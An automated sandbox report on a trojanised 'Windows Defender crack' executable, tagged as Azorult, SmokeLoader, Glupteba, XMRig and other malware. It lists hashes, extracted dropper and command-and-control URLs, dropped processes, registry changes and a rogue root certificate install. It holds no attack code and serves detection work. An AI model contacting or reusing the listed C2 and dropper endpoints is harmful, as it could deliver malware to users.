azorult | f76c2cce93f0ca6de6a05b07666b8140e42ffba43adfd3ce3ab9e95ed739d0da

Analysis

max time kernel
24s
max time network
602s
platform
windows10_x64
resource
win10v20201028
submitted
03-04-2021 06:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Microsoft_Windows_Defender_crack.exe
Size

5.4MB
MD5

be12bd9c6b6e9e5738e171924e141b7d
SHA1

a90d8051e8116fe24abf2605fae1b8ad31f12104
SHA256

6ffb691be76a6756dbda8cc9c12b72be6a6eb89fa32770c9f1c201393c4f708c
SHA512

8c2031c71b856ab8010cfee225a6987e0eb1d9870c4b154a9a75db1829d0fa790dace44352e3932332e6fc612455ddc42adbc14f6ce9f91b6a736595c2986279

Score

10^/10

azorult glupteba metasploit netsupport smokeloader xmrig backdoor dropper evasion infostealer loader miner rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

http://kvaka.li/1210776429.php

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

resource	yara_rule
behavioral3/memory/4228-219-0x00000000026D0000-0x0000000002FDA000-memory.dmp	family_glupteba
behavioral3/memory/4228-221-0x0000000000400000-0x0000000000D24000-memory.dmp	family_glupteba
behavioral3/memory/4228-222-0x0000000000400000-0x0000000000D24000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 8 IoCs

miner

resource	yara_rule
behavioral3/memory/2020-154-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/2020-155-0x00000001402CA898-mapping.dmp	xmrig
behavioral3/memory/2020-165-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/2020-231-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/6936-804-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/6936-916-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/10004-930-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/10004-1213-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig

Executes dropped EXE 10 IoCs

pid	Process
2752	keygen-pr.exe
980	keygen-step-1.exe
832	keygen-step-3.exe
1552	keygen-step-4.exe
2480	key.exe
2500	Setup.exe
1340	multitimer.exe
2068	setups.exe
3636	askinstall20.exe
964	setups.tmp

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	setups.tmp

Loads dropped DLL 7 IoCs

pid	Process
964	setups.tmp
964	setups.tmp
964	setups.tmp
964	setups.tmp
964	setups.tmp
964	setups.tmp
964	setups.tmp

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	rundll32.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 13 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
458	api.ipify.org
576	ipinfo.io
600	ipinfo.io
751	ipinfo.io
123	ipinfo.io
283	ipinfo.io
389	ip-api.com
418	api.ipify.org
753	ipinfo.io
77	api.ipify.org
125	ipinfo.io
169	ip-api.com
281	ipinfo.io

Program crash 11 IoCs

pid	pid_target	Process	procid_target
4300	5772	WerFault.exe	149
4452	4312	WerFault.exe	244
4808	8904	WerFault.exe	351
9464	4496	WerFault.exe	133
11048	5900	WerFault.exe	152
11100	5900	WerFault.exe	152
5452	5900	WerFault.exe	152
10836	5900	WerFault.exe	152
3156	6060	WerFault.exe	431
10612	688	WerFault.exe	447
7460	8380	WerFault.exe	509

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Delays execution with timeout.exe 13 IoCs

evasion

pid	Process
836	timeout.exe
7648	timeout.exe
3308	timeout.exe
11108	timeout.exe
9528	timeout.exe
9304	timeout.exe
1060	timeout.exe
7072	timeout.exe
9244	timeout.exe
5232	timeout.exe
10580	timeout.exe
6448	timeout.exe
3892	timeout.exe

Kills process with taskkill 10 IoCs

evasion

pid	Process
7584	taskkill.exe
4840	taskkill.exe
7348	taskkill.exe
8008	taskkill.exe
324	taskkill.exe
892	taskkill.exe
5468	taskkill.exe
10756	taskkill.exe
3200	taskkill.exe
4212	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 010000006bed0f7c8342488f055f7e4b0cb5aecc9baf5521e7cba86d105307f1942954181262e48e8884bf233db9ba013547f1bfa8182eb61a30c5590a45244c39f2663ecf274fad90d3f77503ec27edc538c6e2b91312cda2c22bb2d284	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 6c3a3b6c55add601	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{BFD03315-15F4-4809-8045-C08EB5B623D0} = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "{E799754D-8C77-4FDE-9583-855E8272B26C}"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "5"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 0100000042aaf37afc274b47485bdb985fbe168aa29f90a7d3d7ce52519b80809d0cd6793184b594d3b9a44627452aa7c21f57671d1cfc687d828ea52f3c0adc564a841f656b7d54ab249d5d1da4731fe9215e879bb5983890d5c75ad1e1da346179c7f2187f8c6ef008fecbe598532dd76410a33e8c392809726985a8ac5184cb380d6e62e093389d052f3fec41133dff887cfcc6bf014271f7079819bc0fb314295f116bae648fcbbb8a1b4fc0d4b9112e11d67d70321c9c0546b50b31efae5febad1c45092c9240ca84504b33126329f4cbfe97bd7339073d0c8c2d2b15cbf21d966a4b11472917d2ddc086bb6040327b696c1fc83a36a93da6c7c8c99f7a6b61454f82e679603d73f0370c797e2aeb635ae596af9dcd2ba7ea0cbf2d1e4f6456c28aa4a87e8d4c4d5def338b57baa44cd7bb039498a70a19d28939764252d89b644cad77fe4830008aa8ef121b098ed603989595ddf8b534d81352c4f0a510d2b843bc73a637ba2b5a52a92ea7b96ca20a541bd469f42c9990d59a36747b799a7ac6d1bc1fa4a870a73a4f005d54424e0ee40470810bbfe6758fcaba7727f0bd12b5dc451ac1f60a	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000c35369f47b6f73184db8d6aec40998257391420f5f866735a803bb72cc77e95f6a57934b8004e64633192d5278f34f34db506c17936754342249	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 494198a45528d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1"	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall20.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a011